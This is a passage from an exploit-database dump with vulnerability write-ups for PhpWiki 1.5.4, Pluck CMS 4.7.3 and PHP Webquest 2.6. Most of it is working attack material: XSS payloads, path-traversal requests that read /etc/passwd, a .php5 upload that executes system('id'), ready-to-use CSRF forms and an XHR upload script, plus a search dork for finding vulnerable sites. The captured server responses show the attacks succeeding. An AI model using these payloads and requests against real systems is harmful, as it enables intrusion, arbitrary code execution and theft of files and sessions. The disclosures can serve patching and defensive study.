sourceforge.net/projects/phpwiki/\r\n# Affected versions: => 1.5.4 (current)\r\n# Tested on: Apache2.2 / PHP5 / Deb32\r\n# Author: Smash_\r\n# Contact: smash [at] devilteam.pl\r\n\r\n\r\n1/ Cross Site Scripting\r\n\r\nCross-site scripting vulnerability in user preferences allows remote unauthenticated users to inject arbitrary web script by injecting code via GET or POST 'pagename' parameter. \r\n\r\nExample url:\r\nhttp://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--\r\n\r\nExample request:\r\nPOST /phpwiki/index.php/UserPreferences HTTP/1.1\r\nHost: 192.168.0.10\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: folder_p-tbx=Open; PHPSESSID=3ko4uprjgmnjtmfkes3dnh0gk4; PhpWiki_WIKI_ID=admin\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 260\r\n\r\npref%5Bemail%5D=&pref%5BnotifyPages%5D=&pref%5Btheme%5D=&pref%5Blang%5D=&pref%5BeditHeight%5D=22&pref%5BeditWidth%5D=80&pref%5BtimeOffset%5D=0&pagename=UserPreferencesabc%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--&action=browse\r\n\r\nExample response:\r\nHTTP/1.1 200 OK\r\nDate: Sat, 29 Aug 2015 21:30:47 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nX-Powered-By: PHP/5.4.41-0+deb7u1\r\nVary: Accept-Encoding\r\nContent-Length: 16114\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\n(...)\r\n<script type=\"text/javascript\">\r\n<!--//\r\nvar rateit_imgsrc = '/phpwiki/themes/wikilens/images/RateIt';\r\nvar rateit_action = 'RateIt';\r\n// --></script>\r\n<script type=\"text/javascript\">\r\n<!--//\r\nvar data_path = '/phpwiki';\r\nvar pagename = 'UserPreferencesabc</script><script>alert(document.cookie)</script><!--';\r\nvar script_url= '/phpwiki/index.php';\r\nvar stylepath = data_path+'/themes/Sidebar/';\r\nvar folderArrowPath = '/phpwiki/themes/default/images';\r\nvar use_path_info = true;\r\n// --></script>\r\n</head>\r\n(...)\r\n\r\n\r\n2/ Local File Inclusion\r\n\r\nDirectory traversal vulnerability in file load section allows authenticated attackers to read arbitrary files via POST or GET 'source' parameter. Content of file will be later available in created page.\r\n\r\nExample url:\r\nhttp://192.168.0.10/phpwiki/index.php/PhpWikiAdministration?action=loadfile&overwrite=1&source=/etc/group\r\n\r\n#1 - Example request:\r\nPOST /phpwiki/index.php/PhpWikiAdministration HTTP/1.1\r\nHost: 192.168.0.10\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration\r\nCookie: folder_p-tbx=Open; folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 76\r\n\r\naction=loadfile&overwrite=&pagename=PhpWikiAdministration&source=/etc/passwd\r\n\r\n#1 - Example response:\r\nHTTP/1.1 200 OK\r\nDate: Sat, 29 Aug 2015 22:09:36 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nX-Powered-By: PHP/5.4.41-0+deb7u1\r\nVary: Accept-Encoding\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nContent-Length: 3534\r\n(...)\r\n<a id=\"contentTop\"></a>\r\n<h1 class=\"firstHeading\">Loading \u201c/etc/passwd\u201d</h1>\r\n <div id=\"bodyContent\">\r\n <em><a href=\"passwd\" class=\"wiki\">passwd</a></em><span> from \u201cplain file /etc/passwd\u201d content is identical to current version 1 - no new revision created</span><p><strong>Complete.</strong></p>\r\n<p>Return to <a href=\"PhpWikiAdministration\" class=\"wiki\">PhpWikiAdministration</a></p>\r\n(...)\r\n\r\n#2 - Example request:\r\nGET /phpwiki/index.php/passwd HTTP/1.1\r\nHost: 192.168.0.10\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration\r\nCookie: folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625\r\nConnection: keep-alive\r\n\r\n#2 - Example response:\r\nHTTP/1.1 200 OK\r\nDate: Sat, 29 Aug 2015 22:10:34 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nX-Powered-By: PHP/5.4.41-0+deb7u1\r\nETag: W/\"97df6cb9b2668497eb1a804ab9c18eb8\"\r\nLast-Modified: Sat, 29 Aug 2015 22:09:55 GMT\r\nCache-Control: must-revalidate\r\nExpires: Sat, 29 Aug 2015 22:10:14 GMT\r\nVary: Cookie\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nContent-Length: 22599\r\n(...)\r\n \r\n<div class=\"wikitext\"><p>root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\r\nbin:x:2:2:bin:/bin:/bin/sh\r\nsys:x:3:3:sys:/dev:/bin/sh\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/bin/sh\r\nman:x:6:12:man:/var/cache/man:/bin/sh\r\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\r\nmail:x:8:8:mail:/var/mail:/bin/sh\r\n<a href=\"news:x:9:9:news:/var/spool/news:/bin/sh\" target=\"_blank\" class=\"namedurl\"><span style=\"white-space: nowrap\"><img src=\"/phpwiki/themes/Sidebar/images/url.png\" alt=\"\" class=\"linkicon\" />news:x:9:9:news:/var/spool/news:/bin/sh</span></a>\r\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\r\nproxy:x:13:13:proxy:/bin:/bin/sh\r\nwww-data:x:33:33:www-data:/var/www:/bin/sh\r\nbackup:x:34:34:backup:/var/backups:/bin/sh\r\nlist:x:38:38:Mailing List Manager:/var/list:/bin/sh\r\nirc:x:39:39:ircd:/var/run/ircd:/bin/sh\r\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\r\nnobody:x:65534:65534:nobody:/nonexistent:/bin/sh\r\nlibuuid:x:100:101::/var/lib/libuuid:/bin/sh\r\nmysql:x:101:103:MySQL Server<sub>,:/nonexistent:/bin/false\r\nmessagebus:x:102:106::/var/run/dbus:/bin/false\r\ncolord:x:103:107:colord colour management daemon</sub>,:/var/lib/colord:/bin/false\r\nusbmux:x:104:46:usbmux daemon<sub>,:/home/usbmux:/bin/false\r\nmiredo:x:105:65534::/var/run/miredo:/bin/false\r\nntp:x:106:113::/home/ntp:/bin/false\r\nDebian-exim:x:107:114::/var/spool/exim4:/bin/false\r\narpwatch:x:108:117:ARP Watcher</sub>,:/var/lib/arpwatch:/bin/sh\r\navahi:x:109:118:Avahi mDNS daemon<sub>,:/var/run/avahi-daemon:/bin/false\r\nbeef-xss:x:110:119::/var/lib/beef-xss:/bin/false\r\ndradis:x:111:121::/var/lib/dradis:/bin/false\r\npulse:x:112:122:<span style=\"text-decoration: underline\" class=\"wikiunknown\"><span>PulseAudio</span><a href=\"PulseAudio?action=create\" title=\"Create: PulseAudio\" onmouseover=\"window.status="Create: PulseAudio"; return true;\" onmouseout=\"window.status='';return true;\" rel=\"nofollow\">?</a></span> daemon</sub>,:/var/run/pulse:/bin/false\r\nspeech-dispatcher:x:113:29:Speech Dispatcher<sub>,:/var/run/speech-dispatcher:/bin/sh\r\nhaldaemon:x:114:124:Hardware abstraction layer</sub>,:/var/run/hald:/bin/false\r\niodine:x:115:65534::/var/run/iodine:/bin/false\r\npostgres:x:116:127:PostgreSQL administrator<sub>,:/var/lib/postgresql:/bin/bash\r\nsshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin\r\nredsocks:x:118:128::/var/run/redsocks:/bin/false\r\nsnmp:x:119:129::/var/lib/snmp:/bin/false\r\nstunnel4:x:120:130::/var/run/stunnel4:/bin/false\r\nstatd:x:121:65534::/var/lib/nfs:/bin/false\r\nsslh:x:122:133::/nonexistent:/bin/false\r\nDebian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false\r\nrtkit:x:124:136:<span style=\"text-decoration: underline\" class=\"wikiunknown\"><span>RealtimeKit</span><a href=\"RealtimeKit?action=create\" title=\"Create: RealtimeKit\" onmouseover=\"window.status="Create: RealtimeKit"; return true;\" onmouseout=\"window.status='';return true;\" rel=\"nofollow\">?</a></span></sub>,:/proc:/bin/false\r\nsaned:x:125:137::/home/saned:/bin/false\r\ndevil:x:1000:1001:devil<sub>,:/home/devil:/bin/bash\r\ndebian-tor:x:126:138::/var/lib/tor:/bin/false\r\nprivoxy:x:127:65534::/etc/privoxy:/bin/false\r\nredis:x:128:139:redis server</sub>,:/var/lib/redis:/bin/false</p>\r\n</div>\r\n(...)\r\n\r\n\r\n3/ Cross Site Request Forgery\r\n\r\nSince there is no csrf protection in application, remote attacker is able to trigger specific actions.\r\n\r\nPoC:\r\n<html>\r\n <!-- Change settings / XSS -->\r\n <body>\r\n <form action=\"http://192.168.0.10/phpwiki/index.php/UserPreferences\" method=\"POST\">\r\n <input type=\"hidden\" name=\"pref[email]\" value=\"\" />\r\n <input type=\"hidden\" name=\"pref[notifyPages]\" value=\"\" />\r\n <input type=\"hidden\" name=\"pref[theme]\" value=\"\" />\r\n <input type=\"hidden\" name=\"pref[lang]\" value=\"\" />\r\n <input type=\"hidden\" name=\"pref[editHeight]\" value=\"22\" />\r\n <input type=\"hidden\" name=\"pref[editWidth]\" value=\"80\" />\r\n <input type=\"hidden\" name=\"pref[timeOffset]\" value=\"0\" />\r\n <input type=\"hidden\" name=\"pagename\" value=\"UserPreferencesabc</script><script>alert(document.cookie)</script><!--\" />\r\n <input type=\"hidden\" name=\"action\" value=\"browse\" />\r\n <input type=\"submit\" value=\"Go\" />\r\n </form>\r\n </body>\r\n</html>\r\n\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/24168"}, {"lastseen": "2016-04-19T04:32:47", "references": [], "description": "Pluck CMS version 4.7.3 suffers from code execution, cross site request forgery, cross site scripting, and local file inclusion vulnerabilities.", "edition": 1, "reporter": "Smash_", "published": "2015-08-28T00:00:00", "type": "zdt", "title": "Pluck 4.7.3 - Multiple vulnerabilities", "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-08-28T00:00:00", "href": "http://0day.today/exploit/description/24161", "id": "1337DAY-ID-24161", "sourceData": "# Title: Pluck 4.7.3 - Multiple vulnerabilities\r\n# Date: 28.08.15\r\n# Vendor: pluck-cms.org\r\n# Affected versions: => 4.7.3 (current)\r\n# Tested on: Apache2.2 / PHP5 / Deb32\r\n# Author: Smash_ | smaash.net\r\n# Contact: smash [at] devilteam.pl\r\n\r\nBugs:\r\n - local file inclusion\r\n - code execution\r\n - stored xss\r\n - csrf\r\n\r\n\r\n1/ LFI\r\n\r\nFile inclusion vulnerability in pluck/admin.php in the in 'action' function allows to include local files or potentially execute arbitrary PHP code.\r\n\r\n#1 - Request (count = en.php by default):\r\nPOST /pluck/admin.php?action=language HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/pluck/admin.php?action=language\r\nCookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 49\r\n\r\ncont1=../../../../../../../etc/passwd&save=Save\r\n\r\n\r\n#1 - Response:\r\nHTTP/1.1 200 OK\r\nDate: Fri, 28 Aug 2015 21:01:47 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nX-Powered-By: PHP/5.4.41-0+deb7u1\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Length: 7374\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html;charset=utf-8\r\n(...)\r\n<div id=\"content\">\r\n\t<h2>language settings</h2>\r\n<div class=\"success\">The language settings have been saved.</div>\r\n(...)\r\n\r\n#2 - Request:\r\nPOST /pluck/admin.php?action=language HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/pluck/admin.php?action=language\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 47\r\n\r\ncont1=../../../../../../etc/passwd%00&save=Save\r\n\r\n#2 - Response:\r\nHTTP/1.1 200 OK\r\nDate: Fri, 28 Aug 2015 20:30:11 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nX-Powered-By: PHP/5.4.41-0+deb7u1\r\nSet-Cookie: PHPSESSID=63erncd2l94qcah8g13bfvcga6; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Length: 4503\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html;charset=utf-8\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\r\nbin:x:2:2:bin:/bin:/bin/sh\r\nsys:x:3:3:sys:/dev:/bin/sh\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/bin/sh\r\nman:x:6:12:man:/var/cache/man:/bin/sh\r\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\r\nmail:x:8:8:mail:/var/mail:/bin/sh\r\nnews:x:9:9:news:/var/spool/news:/bin/sh\r\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\r\nproxy:x:13:13:proxy:/bin:/bin/sh\r\nwww-data:x:33:33:www-data:/var/www:/bin/sh\r\nbackup:x:34:34:backup:/var/backups:/bin/sh\r\nlist:x:38:38:Mailing List Manager:/var/list:/bin/sh\r\nirc:x:39:39:ircd:/var/run/ircd:/bin/sh\r\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\r\nnobody:x:65534:65534:nobody:/nonexistent:/bin/sh\r\nlibuuid:x:100:101::/var/lib/libuuid:/bin/sh\r\nmysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false\r\nmessagebus:x:102:106::/var/run/dbus:/bin/false\r\ncolord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/false\r\nusbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false\r\nmiredo:x:105:65534::/var/run/miredo:/bin/false\r\nntp:x:106:113::/home/ntp:/bin/false\r\nDebian-exim:x:107:114::/var/spool/exim4:/bin/false\r\narpwatch:x:108:117:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh\r\navahi:x:109:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false\r\nbeef-xss:x:110:119::/var/lib/beef-xss:/bin/false\r\ndradis:x:111:121::/var/lib/dradis:/bin/false\r\npulse:x:112:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false\r\nspeech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh\r\nhaldaemon:x:114:124:Hardware abstraction layer,,,:/var/run/hald:/bin/false\r\niodine:x:115:65534::/var/run/iodine:/bin/false\r\npostgres:x:116:127:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash\r\nsshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin\r\nredsocks:x:118:128::/var/run/redsocks:/bin/false\r\nsnmp:x:119:129::/var/lib/snmp:/bin/false\r\nstunnel4:x:120:130::/var/run/stunnel4:/bin/false\r\nstatd:x:121:65534::/var/lib/nfs:/bin/false\r\nsslh:x:122:133::/nonexistent:/bin/false\r\nDebian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false\r\nrtkit:x:124:136:RealtimeKit,,,:/proc:/bin/false\r\nsaned:x:125:137::/home/saned:/bin/false\r\ndevil:x:1000:1001:devil,,,:/home/devil:/bin/bash\r\ndebian-tor:x:126:138::/var/lib/tor:/bin/false\r\nprivoxy:x:127:65534::/etc/privoxy:/bin/false\r\nredis:x:128:139:redis server,,,:/var/lib/redis:/bin/false\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"../../../../../../etc/passwd\" lang=\"../../../../../../etc/passwd\">\r\n<head>\r\n(...)\r\n\r\n\r\n\r\n2/ Code Execution\r\n\r\nBy default .php extenions shall be amended to .txt, but it is able to upload code simply by using other extension like php5.\r\n\r\n#1 - Request:\r\nPOST /pluck/admin.php?action=files HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/pluck/admin.php?action=files\r\nCookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=---------------------------155797884312716218971623852778\r\nContent-Length: 376\r\n\r\n-----------------------------155797884312716218971623852778\r\nContent-Disposition: form-data; name=\"filefile\"; filename=\"phpinfo.php5\"\r\nContent-Type: application/x-php\r\n\r\n<?php\r\nsystem('id');\r\n?>\r\n\r\n-----------------------------155797884312716218971623852778\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload\r\n-----------------------------155797884312716218971623852778--\r\n\r\n\r\n#1 - Response:\r\nHTTP/1.1 200 OK\r\nDate: Fri, 28 Aug 2015 20:41:43 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nX-Powered-By: PHP/5.4.41-0+deb7u1\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Length: 9947\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html;charset=utf-8\r\n(...)\r\n\r\n\r\n#2 - Request:\r\nGET /pluck/files/phpinfo.php5 HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/pluck/admin.php?action=files\r\nCookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525\r\nConnection: keep-alive\r\n\r\n#2 - Response:\r\nHTTP/1.1 200 OK\r\nDate: Fri, 28 Aug 2015 20:41:44 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nX-Powered-By: PHP/5.4.41-0+deb7u1\r\nVary: Accept-Encoding\r\nContent-Length: 54\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\n\r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\n\r\n\r\n\r\n3/ STORED XSS\r\n\r\n a) image upload\r\n \r\nXSS is possible via file name.\r\n\r\nRequest:\r\nPOST /pluck/admin.php?action=images HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/pluck/admin.php?action=images\r\nCookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=---------------------------3184135121063067737320373181\r\nContent-Length: 5013\r\n\r\n-----------------------------3184135121063067737320373181\r\nContent-Disposition: form-data; name=\"imagefile\"; filename=\"<img src=# onerror=alert(1337)>.png\"\r\nContent-Type: image/png\r\n\r\n(...)\r\n\r\n-----------------------------3184135121063067737320373181\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload\r\n-----------------------------3184135121063067737320373181--\r\n\r\nResponse:\r\nHTTP/1.1 200 OK\r\nDate: Fri, 28 Aug 2015 20:43:19 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nX-Powered-By: PHP/5.4.41-0+deb7u1\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Length: 9125\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html;charset=utf-8\r\n(...)\r\n\t\t\t\t<div class=\"menudiv\">\r\n\t\t\t\t\t<strong>Name:</strong> <img src=# onerror=alert(1337)>.png\t\t\t\t\t<br />\r\n\t\t\t\t\t<strong>Size:</strong> 4653 bytes\t\t\t\t\t<br />\r\n\t\t\t\t\t<strong>Type:</strong> image/png\t\t\t\t\t<br />\r\n\t\t\t\t\t<strong>Upload successful!</strong>\r\n\t\t\t\t</div>\r\n(...)\r\n\r\n\r\n b) page\r\n \r\nXSS is possible when changing request, value of POST 'content' will be encoded by default.\r\n\r\n#1 - Request:\r\nPOST /pluck/admin.php?action=editpage HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/pluck/admin.php?action=editpage\r\nCookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 127\r\n\r\ntitle=hello12&seo_name=&content=<script>alert(1337)</script>&description=&keywords=&hidden=no&sub_page=&theme=default&save=Save\r\n\r\n#1 - Response:\r\nHTTP/1.1 200 OK\r\nDate: Fri, 28 Aug 2015 21:11:43 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nX-Powered-By: PHP/5.4.41-0+deb7u1\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Length: 7337\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html;charset=utf-8\r\n\r\n#2 - Request:\r\nGET /pluck/?file=hello12 HTTP/1.1\r\nHost: localhost\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/pluck/?file=hello\r\nCookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525\r\nConnection: keep-alive\r\n\r\n#2 - Response:\r\nHTTP/1.1 200 OK\r\nDate: Fri, 28 Aug 2015 21:11:51 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nX-Powered-By: PHP/5.4.41-0+deb7u1\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Length: 1289\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html;charset=utf-8\r\n(...)\r\n\t\t<div class=\"submenu\">\r\n\t\t\t\t\t\t</div>\r\n\t\t<div class=\"kop\">hello12</div>\r\n\t\t<div class=\"txt\">\r\n\t\t\t<script>alert(1337)</script>\t\t\t\t\t</div>\r\n\t\t<div style=\"clear: both;\"> </div>\r\n\t\t<div class=\"footer\">\r\n(...)\r\n\r\n\r\n\r\n\r\n4/ CSRF\r\n\r\nSince there is no protection at all, it is able to trigger many actions via cross site request forgery.\r\n\r\n<html>\r\n <!-- Change site settings -->\r\n <body>\r\n <form action=\"http://localhost/pluck/admin.php?action=settings\" method=\"POST\">\r\n <input type=\"hidden\" name=\"cont1\" value=\"pwn\" />\r\n <input type=\"hidden\" name=\"cont2\" value=\"usr@mail.box\" />\r\n <input type=\"hidden\" name=\"save\" value=\"Save\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n\r\n<html>\r\n <!-- File upload -->\r\n <body>\r\n <script>\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", \"http://localhost/pluck/admin.php?action=files\", true);\r\n xhr.setRequestHeader(\"Accept\", \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\");\r\n xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart/form-data; boundary=---------------------------155797884312716218971623852778\");\r\n xhr.withCredentials = true;\r\n var body = \"-----------------------------155797884312716218971623852778\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"filefile\\\"; filename=\\\"phpinfo.php5\\\"\\r\\n\" + \r\n \"Content-Type: application/x-php\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"\\x3c?php\\r\\n\" + \r\n \"system(\\'id\\');\\r\\n\" + \r\n \"?\\x3e\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"-----------------------------155797884312716218971623852778\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"submit\\\"\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"Upload\\r\\n\" + \r\n \"-----------------------------155797884312716218971623852778--\";\r\n var aBody = new Uint8Array(body.length);\r\n for (var i = 0; i < aBody.length; i++)\r\n aBody[i] = body.charCodeAt(i); \r\n xhr.send(new Blob([aBody]));\r\n </body>\r\n</html>\r\n\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/24161"}, {"lastseen": "2016-04-19T01:32:41", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "jordan root", "published": "2015-01-26T00:00:00", "type": "zdt", "title": "PHP Webquest 2.6 - SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-26T00:00:00", "href": "http://0day.today/exploit/description/23194", "id": "1337DAY-ID-23194", "sourceData": "# Exploit Title: sql injection\r\n# Google Dork: inurl:webquest/soporte_horizontal_w.php?id_actividad=\r\n# Date: [24/01/2015]\r\n# Exploit Author: [jord4nroo7] anonjo@aol.com\r\n# Vendor Homepage: [http://phpwebquest.org]\r\n# Software Link: [http://phpwebquest.org/?page_id=14]\r\n# Version: [phpwebquest-2.6]\r\n# Tested on: [windows 8.1]\r\n#Exploit: sql inhection found on phpwebquest script version 2.6\r\n#\r\n \r\n#example http://localhost/phpwq/webquest/soporte_horizontal_w.php?id_actividad=184&id_pagina=1%27'\r\n \r\n#---------------------------\r\nif ($_GET['id_actividad']!=''){\r\n $id_actividad=$_GET['id_actividad'];--------->sqlinjection here\r\n}else{\r\n $id_actividad='1500000';\r\n}\r\nif ($_GET['id_pagina']!=''){\r\n $id_pagina=$_GET['id_pagina'];\r\n}else{\r\n $id_pagina='1';\r\n $texto_actual=$texto_alternativo;\r\n $imagen_actual='../imagenes/no_imagen.gif';\r\n}\r\n#----------------------------\r\n<?\r\nsession_cache_limiter('nocache,private');\r\nsession_start();\r\nsession_set_cookie_params(0, \"/\", $HTTP_SERVER_VARS[\"HTTP_HOST\"], 0);\r\ninclude(\"../include/mysql.php\");\r\ninclude(\"../include/idioma.php\");\r\n \r\n$base=$mysql_db;\r\n$c=mysql_connect($mysql_server,$mysql_login,$mysql_pass);\r\nmysql_select_db ($base, $c);\r\n#para solucionar un problema que se plantea cuando los usuarios crean la actividad pero no crean 